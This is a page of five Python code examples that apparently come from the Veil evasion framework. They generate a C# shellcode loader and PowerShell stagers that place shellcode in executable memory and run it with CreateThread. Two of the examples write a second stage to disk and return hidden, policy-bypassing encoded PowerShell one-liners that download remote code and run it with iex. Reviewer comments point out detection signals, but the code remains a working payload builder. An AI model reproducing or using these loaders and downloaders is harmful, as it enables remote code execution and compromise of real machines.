Esempio n. 1
0
	def generate(self):
		"""Return C# source for a loader that runs the configured shellcode.

		The emitted program places the byte array in memory obtained from
		VirtualAlloc with PAGE_EXECUTE_READWRITE (0x40), starts it on a new
		thread with CreateThread and blocks on WaitForSingleObject. Only the
		source text is produced here; nothing is compiled or written to disk.
		"""
		
		# self.shellcode is a project object; presumably generate() returns the
		# bytes as a string of "\xNN" escapes -- TODO confirm against the
		# shellcode module. Splitting on the backslash, dropping the empty lead
		# element and re-joining with ",0" (plus the leading "0") rewrites
		# "\x41\x42" as "0x41,0x42", i.e. a C# byte-array initializer.
		shellcode = self.shellcode.generate()
		shellcode = "0" + ",0".join(shellcode.split("\\")[1:])

		payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
		payloadCode += "namespace payload { class Program  { static void Main() {\n"
		# No "\n" terminates this fragment, so the array literal and the
		# VirtualAlloc call share one line in the emitted source.
		payloadCode += "byte[] s = {"+shellcode+"};"
		# RWX region sized to the array; MEM_COMMIT / PAGE_EXECUTE_READWRITE are
		# the static fields declared further down (0x1000 / 0x40).
		payloadCode += "UInt32 funcAddr = VirtualAlloc(0, (UInt32)s.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
		payloadCode += "Marshal.Copy(s, 0, (IntPtr)(funcAddr), s.Length);\n"
		payloadCode += "IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; IntPtr pinfo = IntPtr.Zero;\n"
		payloadCode += "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);\n"
		# 0xFFFFFFFF is INFINITE: the host thread waits for as long as the
		# injected thread runs.
		payloadCode += "WaitForSingleObject(hThread, 0xFFFFFFFF);}\n"
		payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
		# P/Invoke declarations for the three kernel32 calls used above. From a
		# detection standpoint this import set (VirtualAlloc with an RWX protect,
		# CreateThread, WaitForSingleObject) is what a reviewer or scanner of
		# the resulting binary would key on.
		payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport(\"kernel32\")]private static extern IntPtr CreateThread(
          UInt32 lpThreadAttributes,
          UInt32 dwStackSize,
          UInt32 lpStartAddress,
          IntPtr param,
          UInt32 dwCreationFlags,
          ref UInt32 lpThreadId);
        [DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); } }\n"""

		return payloadCode
Esempio n. 2
0
    def generate(self):
        """Write a PowerShell second stage to disk and return a downloader one-liner.

        Three things happen here:

        1. A PowerShell script that Add-Type-compiles VirtualAlloc / CreateThread /
           memset P/Invoke stubs and embeds the shellcode is built, encoded the
           way ``powershell -Enc`` expects (UTF-16LE, then base64) and written as
           ``powershell -Enc <b64>`` to ``veil.PAYLOAD_SOURCE_PATH + payloadName``.
        2. ``self.notes`` is set to tell the user where that file is and on which
           host/port it is expected to be served.
        3. The returned string holds two ``powershell ... -Enc`` command lines
           (labelled x86 and x64) whose decoded body is an ``iex`` of
           ``DownloadString`` against ``http://DownloadHost:DownloadPort/payloadName``.

        Python 2 only: relies on the ``unicode`` builtin and on
        ``base64.b64encode`` accepting a text string.
        """

        # Presumably generate() yields "\xNN" escapes -- TODO confirm. Joining
        # the backslash-split pieces with ",0" and dropping the first character
        # rewrites "\x41\x42" as "0x41,0x42" for the [Byte[]] literal below.
        shellcode = self.shellcode.generate()
        shellcode = ",0".join(shellcode.split("\\"))[1:]

        # Stage script. VirtualAlloc(0,0x1000,0x3000,0x40) is a fixed 0x1000-byte
        # RWX allocation (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 =
        # PAGE_EXECUTE_READWRITE); it is not sized from $sc.Length. The bytes are
        # copied one at a time through msvcrt memset, then CreateThread runs them
        # and Start-Sleep keeps the host process alive. $x.ToInt32() means the
        # script only runs inside a 32-bit PowerShell host. The Add-Type /
        # DllImport block is fully visible to script-block logging and AMSI once
        # the -Enc argument is decoded.
        baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)

        # Hand-rolled UTF-16LE: a NUL after every character. Equivalent to
        # .encode("utf-16le") only for ASCII input; b64encode of a Python 2
        # unicode object goes through the implicit ASCII codec and would raise
        # on anything else. Quadratic string building, but the input is small.
        powershell_command = unicode(baseString)
        blank_command = ""
        for char in powershell_command:
            blank_command += char + "\x00"
        powershell_command = blank_command
        powershell_command = base64.b64encode(powershell_command)

        # Project helper; assumed to return a filesystem-safe name -- TODO confirm.
        payloadName = randomizer.randomString()

        # write base64 payload out to disk
        # The bare attribute access below is a no-op statement with no effect.
        veil.PAYLOAD_SOURCE_PATH
        # Plain concatenation: assumes PAYLOAD_SOURCE_PATH already ends with a
        # path separator -- TODO confirm.
        secondStageName = veil.PAYLOAD_SOURCE_PATH + payloadName
        # Opened in text mode without a context manager; closed explicitly.
        f = open(secondStageName, 'w')
        f.write("powershell -Enc %s\n" % (powershell_command))
        f.close()

        # give notes to the user
        # required_options values are indexed with [0]; presumably each entry is
        # a [value, description] pair -- TODO confirm against the option parser.
        self.notes = "\n\tsecondary payload written to " + secondStageName + " ,"
        self.notes += " serve this on http://%s:%s\n" % (
            self.required_options["DownloadHost"][0],
            self.required_options["DownloadPort"][0],
        )

        # build our downloader shell
        # Cleartext HTTP fetch piped into iex; host and port are not validated or
        # URL-escaped here, so they must already be well-formed.
        downloaderCommand = "iex (New-Object Net.WebClient).DownloadString(\"http://%s:%s/%s\")\n" % (
            self.required_options["DownloadHost"][0],
            self.required_options["DownloadPort"][0], payloadName)
        # Same UTF-16LE + base64 transform as above, applied to the downloader.
        powershell_command = unicode(downloaderCommand)
        blank_command = ""
        for char in powershell_command:
            blank_command += char + "\x00"
        powershell_command = blank_command
        powershell_command = base64.b64encode(powershell_command)

        # Both command lines carry the same encoded body; the "x64" variant only
        # differs by invoking the 32-bit host under %WinDir%\syswow64. The flag
        # set -NoP -NonI -W Hidden -Exec Bypass -Enc is a well-known command-line
        # pattern in process-creation telemetry.
        downloaderCode = "x86 powershell command:\n"
        downloaderCode += "\tpowershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command
        downloaderCode += "\n\nx64 powershell command:\n"
        downloaderCode += "\t%WinDir%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command + "\n"

        return downloaderCode
Esempio n. 3
0
	def generate(self):
		"""Write a PowerShell second stage to disk and return a downloader one-liner.

		Builds a PowerShell script that Add-Type-compiles VirtualAlloc /
		CreateThread / memset P/Invoke stubs around the embedded shellcode,
		encodes it as ``powershell -Enc`` expects (UTF-16LE, then base64), writes
		``powershell -Enc <b64>`` to ``veil.PAYLOAD_SOURCE_PATH + payloadName``,
		fills ``self.notes`` with the file location and serving host/port, and
		returns two ``powershell ... -Enc`` command lines (labelled x86 and x64)
		whose decoded body ``iex``es a ``DownloadString`` of that file over HTTP.

		Python 2 only: relies on the ``unicode`` builtin and on
		``base64.b64encode`` accepting a text string.
		"""

		# NOTE(review): `shellcode` is assigned on the next line, which makes it a
		# local for the whole function; this reference to the `shellcode` module
		# therefore raises UnboundLocalError as written, unless the name is
		# rebound some way not visible here.
		self.shellcode = shellcode.Shellcode()
		# Presumably "\xNN" escapes -- TODO confirm. Joining the backslash-split
		# pieces with ",0" and dropping the first character rewrites "\x41\x42"
		# as "0x41,0x42" for the [Byte[]] literal below.
		shellcode = self.shellcode.generate()
		shellcode = ",0".join(shellcode.split("\\"))[1:]
		
		# Stage script. VirtualAlloc(0,0x1000,0x3000,0x40) is a fixed 0x1000-byte
		# RWX allocation (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 =
		# PAGE_EXECUTE_READWRITE), not sized from $sc.Length. Bytes are copied
		# one at a time via msvcrt memset, CreateThread runs them and Start-Sleep
		# keeps the host alive. $x.ToInt32() restricts this to a 32-bit host. The
		# Add-Type / DllImport block is visible to script-block logging and AMSI
		# once the -Enc argument is decoded.
		baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)

		# Hand-rolled UTF-16LE: a NUL after every character. Equivalent to
		# .encode("utf-16le") only for ASCII input; b64encode of a Python 2
		# unicode object goes through the implicit ASCII codec and would raise
		# on anything else.
		powershell_command  = unicode(baseString)
		blank_command = ""
		for char in powershell_command:
			blank_command += char + "\x00"
		powershell_command = blank_command
		powershell_command = base64.b64encode(powershell_command)

		# Project helper; assumed to return a filesystem-safe name -- TODO confirm.
		payloadName = randomizer.randomString()
		
		# write base64 payload out to disk
		# The bare attribute access below is a no-op statement with no effect.
		veil.PAYLOAD_SOURCE_PATH
		# Plain concatenation: assumes PAYLOAD_SOURCE_PATH already ends with a
		# path separator -- TODO confirm.
		secondStageName = veil.PAYLOAD_SOURCE_PATH + payloadName
		# Text mode, no context manager; closed explicitly below.
		f = open( secondStageName , 'w')
		f.write("powershell -Enc %s\n" %(powershell_command))
		f.close()
		
		
		# give notes to the user
		# required_options values are indexed with [0]; presumably each entry is
		# a [value, description] pair -- TODO confirm against the option parser.
		self.notes = "\n\tsecondary payload written to " + secondStageName + " ,"
		self.notes += " serve this on http://%s:%s\n" %(self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0],)
		
		
		# build our downloader shell
		# Cleartext HTTP fetch piped into iex; host and port are neither validated
		# nor URL-escaped here, so they must already be well-formed.
		downloaderCommand = "iex (New-Object Net.WebClient).DownloadString(\"http://%s:%s/%s\")\n" %(self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0], payloadName)
		# Same UTF-16LE + base64 transform as above, applied to the downloader.
		powershell_command = unicode(downloaderCommand)
		blank_command = ""
		for char in powershell_command:
			blank_command += char + "\x00"
		powershell_command = blank_command
		powershell_command = base64.b64encode(powershell_command)
		
		# Both lines carry the same encoded body; the "x64" variant only differs
		# by invoking the 32-bit host under %WinDir%\syswow64. The flag set
		# -NoP -NonI -W Hidden -Exec Bypass -Enc is a well-known command-line
		# pattern in process-creation telemetry.
		downloaderCode = "x86 powershell command:\n"
		downloaderCode += "\tpowershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command
		downloaderCode += "\n\nx64 powershell command:\n"
		downloaderCode += "\t%WinDir%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command + "\n"

		return downloaderCode
Esempio n. 4
0
    def psRaw(self):
        """Return the un-encoded PowerShell stage as a plain string.

        The script Add-Type-compiles VirtualAlloc / CreateThread / memset
        P/Invoke stubs, embeds the shellcode as a ``[Byte[]]`` literal, copies it
        into a fixed 0x1000-byte RWX allocation (0x3000 = MEM_COMMIT|MEM_RESERVE,
        0x40 = PAGE_EXECUTE_READWRITE) one byte at a time, starts it with
        CreateThread and sleeps to keep the host alive. ``$x.ToInt32()`` limits
        it to a 32-bit PowerShell host. No encoding and no disk I/O happen here;
        the returned text is what script-block logging would record.
        """

        # Presumably "\xNN" escapes -- TODO confirm. Joining the backslash-split
        # pieces with ",0" and dropping the first character rewrites "\x41\x42"
        # as "0x41,0x42" for the [Byte[]] literal below.
        shellcode = self.shellcode.generate()
        shellcode = ",0".join(shellcode.split("\\"))[1:]

        baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)

        return baseString
Esempio n. 5
0
	def psRaw(self):
		"""Return the un-encoded PowerShell stage as a plain string.

		The script Add-Type-compiles VirtualAlloc / CreateThread / memset
		P/Invoke stubs, embeds the shellcode as a ``[Byte[]]`` literal, copies it
		into a fixed 0x1000-byte RWX allocation (0x3000 = MEM_COMMIT|MEM_RESERVE,
		0x40 = PAGE_EXECUTE_READWRITE) one byte at a time, starts it with
		CreateThread and sleeps to keep the host alive. ``$x.ToInt32()`` limits
		it to a 32-bit PowerShell host. No encoding and no disk I/O happen here;
		the returned text is what script-block logging would record.
		"""

		# Presumably "\xNN" escapes -- TODO confirm. Joining the backslash-split
		# pieces with ",0" and dropping the first character rewrites "\x41\x42"
		# as "0x41,0x42" for the [Byte[]] literal below.
		shellcode = self.shellcode.generate()
		shellcode = ",0".join(shellcode.split("\\"))[1:]
	
		baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)

		return baseString